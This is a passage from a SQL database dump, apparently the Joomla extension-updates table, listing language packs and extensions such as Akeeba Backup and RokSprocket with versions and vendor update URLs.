Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25921,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25922,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25923,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25924,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25925,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25926,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25927,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25928,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25929,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25930,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25931,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25932,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25933,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25934,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25935,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25936,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25937,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25938,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25939,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25940,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25941,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25942,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25943,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25944,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25945,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25946,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25947,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25948,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25949,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25950,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25951,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25952,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25953,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25954,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25955,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25956,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25957,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25958,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25959,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(25960,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(25961,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(25962,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25963,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25964,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25965,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25966,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25967,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25968,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25969,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25970,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25971,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25972,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25973,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25974,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25975,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25976,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25977,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25978,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25979,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25980,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25981,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25982,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25983,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25984,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25985,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25986,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25987,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25988,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25989,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25990,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25991,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25992,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25993,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25994,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25995,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25996,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25997,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25998,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25999,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26000,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26001,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26002,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26003,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26004,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26005,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26006,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26007,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26008,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26009,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26010,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26011,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26012,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26013,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26014,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26015,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26016,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26017,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26018,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26019,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26020,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26021,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26022,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26023,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26024,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26025,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26026,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26027,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26028,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26029,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26030,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26031,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(26032,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(26033,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(26034,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(26035,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(26036,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(26037,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(26038,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(26039,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(26040,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(26041,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26042,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26043,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26044,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26045,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26046,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26047,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26048,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26049,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26050,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26051,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26052,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26053,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26054,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26055,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26056,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26057,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26058,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26059,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26060,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26061,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26062,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26063,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26064,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26065,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26066,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26067,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26068,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26069,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26070,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26071,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26072,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26073,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26074,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26075,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26076,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26077,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26078,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26079,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26080,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26081,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26082,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26083,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26084,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26085,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26086,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26087,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26088,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26089,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26090,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(26091,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(26092,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(26093,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26094,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26095,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26096,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26097,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26098,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26099,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26100,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26101,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26102,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26103,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26104,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26105,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26106,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26107,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26108,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26109,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26110,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26111,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26112,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26113,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26114,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26115,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26116,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26117,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26118,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26119,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26120,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26121,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26122,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26123,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26124,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26125,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26126,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26127,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26128,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26129,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26130,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26131,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26132,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26133,3,0,'English 